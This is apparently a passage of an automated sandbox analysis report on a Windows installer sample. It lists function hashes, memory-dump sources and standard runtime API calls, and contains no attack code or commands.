                            • Opcode ID: 2d001f70021adf80f04e27e8359f5713b9c218b059c1a64901c9b96791ed9031
                            • Instruction ID: 681d71d8b17f90cd8df8f2b0130721b0a9b150e43c7fc440664bbe33ddc1a647
                            • Opcode Fuzzy Hash: 2d001f70021adf80f04e27e8359f5713b9c218b059c1a64901c9b96791ed9031
                            • Instruction Fuzzy Hash: E4C1C371604B0A8BE328CF2EC4906AAB7E2EBD4314F558A2DC196C7F45D774B4A5CB80
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                             • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ec689b497c358338b72b358a92d889533f653208c8e8c7d7476938d601be6615
                            • Instruction ID: 13bd6aa1b3d048bf5d082f2cc20f8f2f64238a1f626b6732d27aa6211959d156
                            • Opcode Fuzzy Hash: ec689b497c358338b72b358a92d889533f653208c8e8c7d7476938d601be6615
                            • Instruction Fuzzy Hash: 2FE1E6B18047A64FE398EF5CDCA4A3577A1EBC8300F4B427DDA650B392D734A942DB94
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                             • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                            • Instruction ID: 5a064fda292567be80986231fe42cdf4d20ec14d2d7bb61d13eb17309946ec92
                            • Opcode Fuzzy Hash: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                            • Instruction Fuzzy Hash: E5C1B4352047418BC718CF3ED0A4696BBE2AFEA314F158A6DC8CA4BF55DA30A40ECB55
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                             • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 070d0fd322238de923fe1a2eebb0020640b7b085cfb472be6ac79834afb9933a
                            • Instruction ID: ba071351bf75652f3004abf5598919c0e0480bad32828ead223fc032accc69cd
                            • Opcode Fuzzy Hash: 070d0fd322238de923fe1a2eebb0020640b7b085cfb472be6ac79834afb9933a
                            • Instruction Fuzzy Hash: E6B16E76A012408FC340CF29C884254BBA2FF9532CB79879EC5948FA46E336E957CBD1
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1abcbd09df316e1226b3bd6821a11b0a668bf7f1b83a95c986258978a9b95a2f
                            • Instruction ID: 0ca8e98165fcce992f069bc9c4ef70a52a36962075f14108c58ffcf9141f9a63
                            • Opcode Fuzzy Hash: 1abcbd09df316e1226b3bd6821a11b0a668bf7f1b83a95c986258978a9b95a2f
                            • Instruction Fuzzy Hash: FFD1F8B1848B9A5FD394EF4DEC81A357762AF88301F4A8239DB6007753D634BB12D794
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                            • Instruction ID: 85dbeaba1ce4ce4bb0a53c780f05943ff9f086f3944403fefc393ce947d76857
                            • Opcode Fuzzy Hash: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                            • Instruction Fuzzy Hash: 2BB1EE75704B054BD324DE39C9907EBB7E1AF80308F80492DC9BA87781EF39A6598B95
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7f5f8248f8a18455fd1713549b4a266ce9d34d374119e8c9520886de18fa66fd
                            • Instruction ID: 9b4391ee8d05ea9bab2deb4299fd0fe4d587065d654162a1c40ef8d5bf56e1e1
                            • Opcode Fuzzy Hash: 7f5f8248f8a18455fd1713549b4a266ce9d34d374119e8c9520886de18fa66fd
                            • Instruction Fuzzy Hash: 8B6152B23082158FD308CF9AE590A96B3E5EBA9321B1685BFD105CF761E771DC51CB18
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1e144e3ab01ad0c1374fc479d6e69199773169d0809bfde8fbea9fa4d5497ab0
                            • Instruction ID: 9815e274b5cd2848090ad3de9de8cf52ce4d5d6bfd2b87891d2d3dbc95da5f31
                            • Opcode Fuzzy Hash: 1e144e3ab01ad0c1374fc479d6e69199773169d0809bfde8fbea9fa4d5497ab0
                            • Instruction Fuzzy Hash: 42918F7281871A8BD314CF18C88025AB7E0FB98308F09067DED9AA7341D739EA55CBD5
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                            • Instruction ID: d1cfecabb0105dacb6a2643d6151513b6b57dea1c47c7430775c829df70eeff2
                            • Opcode Fuzzy Hash: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                            • Instruction Fuzzy Hash: 73519D72F006099BDB08CE98DDA16EDBBF2EB98308F24816DD515E7781DB749B41CB90
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                            • Instruction ID: fefd657d7de02f0ce480e112fdcffaf23b5fb9201c90ca5bf8bd65b39b6defe3
                            • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                            • Instruction Fuzzy Hash: 483114277A440103CB0CCE3BCC1679F91535BE466A70ECF796C05DEF55D92CC8124144
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
                            • Instruction ID: c05860dbccefb04b1e7e4798d7fc7ad9ff2498bd5433739ddb1f6c4af6757371
                            • Opcode Fuzzy Hash: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
                            • Instruction Fuzzy Hash: B83128B3500A064BF601852B8D843567223DFD2368F2AC7E5D9B687EECCA71DA27C180
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 69d074c34a2def6d804bdbc3328af019823b1a6a4464c67451b70719eeaddbc9
                            • Instruction ID: 69184b3017b9e74580d067cb4fd77ebecc050b2a5a0c56c7b718772ec9c58d5e
                            • Opcode Fuzzy Hash: 69d074c34a2def6d804bdbc3328af019823b1a6a4464c67451b70719eeaddbc9
                            • Instruction Fuzzy Hash: 754193B190470A8FD714CF19C89066AB3E4FF88358F454A6DED5A97341E334EA25CB91
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d2e9eb99358111aa00ddd4771d36b21c13931b70b848b90c87e332bda565fdca
                            • Instruction ID: edeb2340178ca895664af6dccfa967fe7386a1800d431c99dc79f432f88e672b
                            • Opcode Fuzzy Hash: d2e9eb99358111aa00ddd4771d36b21c13931b70b848b90c87e332bda565fdca
                            • Instruction Fuzzy Hash: 4E2178B1A097E607E7208E2DCCD037477D29BC2305F194279DAA08FA87D57984A2DA60
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2f6c02fb19c880906673f7e2ee61692b55198f776a78d908325c4e40f91ba080
                            • Instruction ID: f2b20f06f47ea6ffd626ab998c448ec522f81e3472c7de585349f1a92591db36
                            • Opcode Fuzzy Hash: 2f6c02fb19c880906673f7e2ee61692b55198f776a78d908325c4e40f91ba080
                            • Instruction Fuzzy Hash: 7C21077291E42547C301DF2DE888677B3E1FFD431DF678A2AD9928B5C1C628D444DAE0
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d76c5a5bc13364a97e7cc912041d9df0cf3f333301463df377c6d5e010c89ef9
                            • Instruction ID: c396a4b606fdaf11cbb04716f96e53414bb6da70810806092226aff9b0fc4d2b
                            • Opcode Fuzzy Hash: d76c5a5bc13364a97e7cc912041d9df0cf3f333301463df377c6d5e010c89ef9
                            • Instruction Fuzzy Hash: 662127326061148FC701EF6AD98469B73E6FFC8365F67CA3DDD8147B80C634E6068AA0
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b8de0586c271a62662545cbcc3a7a3f305336ecaaee466a7150af84251bbb2fa
                            • Instruction ID: 25b7996f2e115279a4f55b63d71d3b5b77a58a91a4cc89954b92f25245d01042
                            • Opcode Fuzzy Hash: b8de0586c271a62662545cbcc3a7a3f305336ecaaee466a7150af84251bbb2fa
                            • Instruction Fuzzy Hash: 7E01817291462E57DB289F48CC41136B390FB85312F49823ADD479B385E734F970C6D4
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0bc074a8e8dbc7e9737371196c3da618bae0f53b316db7e96f66f11567fb7a96
                            • Instruction ID: 2d6a25ab0da437889a089decac06e520e59b7f0a030a384777666637b2cc3ca6
                            • Opcode Fuzzy Hash: 0bc074a8e8dbc7e9737371196c3da618bae0f53b316db7e96f66f11567fb7a96
                            • Instruction Fuzzy Hash: 85F01532A19224EBCB128B89C905B8D73F8EB45B65F210096F911AB680C6B0EE40CBD1
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                            • Instruction ID: eda7399c7f4228211c14b955b80d2ac5182c28dcdc8ed9d9ba79572a1d56a819
                            • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                            • Instruction Fuzzy Hash: FDE08C32A12238EBCB14CB8CC900E8EB7FCEB44A14B2101A6BA11E3A00C270EE00D7C1
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                            • API String ID: 3519838083-609671
                            • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                            • Instruction ID: 39a608cfb4acaab27fc287e3ca51147d2258a503ad68397d0935be2e2bf51bbf
                            • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                            • Instruction Fuzzy Hash: 2ED1B371A0820A9FCF01CFE4D984BEDB7B5FF59308F144069E455A3E50DB78AA48CBA0
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 6BF82F95
                            • std::_Lockit::_Lockit.LIBCPMT ref: 6BF82FAF
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6BF82FD0
                            • __Getctype.LIBCPMT ref: 6BF83084
                            • std::_Facet_Register.LIBCPMT ref: 6BF8309C
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6BF830B7
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                            • String ID: py
                            • API String ID: 1102183713-1403765651
                            • Opcode ID: 4a8da8e5822590206595af82536037f905545417b4d3dce0124d8cfae7ae58b9
                            • Instruction ID: 8996c278f3ee6307246d9648613184628e23ef6d91cabd12dd3488f355cc4ed9
                            • Opcode Fuzzy Hash: 4a8da8e5822590206595af82536037f905545417b4d3dce0124d8cfae7ae58b9
                            • Instruction Fuzzy Hash: 5D4168B2E002158FCB10CF98D851B9EBBF0FF48714F058158E869AB760DB39A904CFA1
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: __aulldiv$H_prolog
                            • String ID: >WJ$x$x
                            • API String ID: 2300968129-3162267903
                            • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                            • Instruction ID: 3fa36cfcd66f83793568c4bf4c16be96aa7e32f543e2877014ad4d50707f73b3
                            • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                            • Instruction Fuzzy Hash: 3E126A71A0021DEFDF10DFA4C880ADDBBB5FF18318F24856AE925AB650DB35A985CF50
                            APIs
                            • _ValidateLocalCookies.LIBCMT ref: 6C0BA077
                            • ___except_validate_context_record.LIBVCRUNTIME ref: 6C0BA07F
                            • _ValidateLocalCookies.LIBCMT ref: 6C0BA108
                            • __IsNonwritableInCurrentImage.LIBCMT ref: 6C0BA133
                            • _ValidateLocalCookies.LIBCMT ref: 6C0BA188
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                            • String ID: csm
                            • API String ID: 1170836740-1018135373
                            • Opcode ID: 76e3d2be325ae3a9ef37b821db7baddad17f06edea34c8d5d430bd1ddc517453
                            • Instruction ID: e6382a01ee3ce53644ceca863b1e9c7019c1890f5b418ea16f0faa66e7efc0cb
                            • Opcode Fuzzy Hash: 76e3d2be325ae3a9ef37b821db7baddad17f06edea34c8d5d430bd1ddc517453
                            • Instruction Fuzzy Hash: 7B41BF34E01218ABCF10CF68C890BAEBBF5BF45328F208555E918BB751D732EA15CB91
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID: api-ms-$ext-ms-
                            • API String ID: 0-537541572
                            • Opcode ID: 22cd1131ac30812ce6d178237e1cfdf6f3b7a4cb6208594aa729f725744de7d5
                            • Instruction ID: 2c99a3c7f23f7f2de731914883f8513dcbbbe0adadadbd8354a87f1f7ebbcdbc
                            • Opcode Fuzzy Hash: 22cd1131ac30812ce6d178237e1cfdf6f3b7a4cb6208594aa729f725744de7d5
                            • Instruction Fuzzy Hash: CC21A832F46A11BBDB118A6DDC40B5F3FE89F06778F150650ED29A7681DB38EC0086E2
                            APIs
                            • GetConsoleCP.KERNEL32(?,6C0CB640,?), ref: 6C0CC469
                            • __fassign.LIBCMT ref: 6C0CC648
                            • __fassign.LIBCMT ref: 6C0CC665
                            • WriteFile.KERNEL32(?,6C0D6026,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0CC6AD
                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C0CC6ED
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0CC799
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: FileWrite__fassign$ConsoleErrorLast
                            • String ID:
                            • API String ID: 4031098158-0
                            • Opcode ID: 499478d565538197db84987c1f09b12204c4095521a0214ae46c5a689b829554
                            • Instruction ID: 1feffaaa7df327061e7e106d5a8e6972801fb530aba01c42bffe04b8b2b80079
                            • Opcode Fuzzy Hash: 499478d565538197db84987c1f09b12204c4095521a0214ae46c5a689b829554
                            • Instruction Fuzzy Hash: 53D1A775E012489FCF11DFA8C880AEDBBF5EF49314F28426AE855BB241D731AA46CF51
                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: __aulldiv$__aullrem
                            • String ID:
                            • API String ID: 2022606265-0
                            • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                            • Instruction ID: 3429d59b719819da98ae7f38b6fd74f5eac2bfb3ee288ec78aef8055d693ae35
                            • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                            • Instruction Fuzzy Hash: C7219335605219FBDF208E949C40FDF7AAAFF457A8F20C626B934616D0D2718D91CAE1
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C0FA6F1
                              • Part of subcall function 6C109173: __EH_prolog.LIBCMT ref: 6C109178
                            • __EH_prolog.LIBCMT ref: 6C0FA8F9
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0E8000, based on PE: true
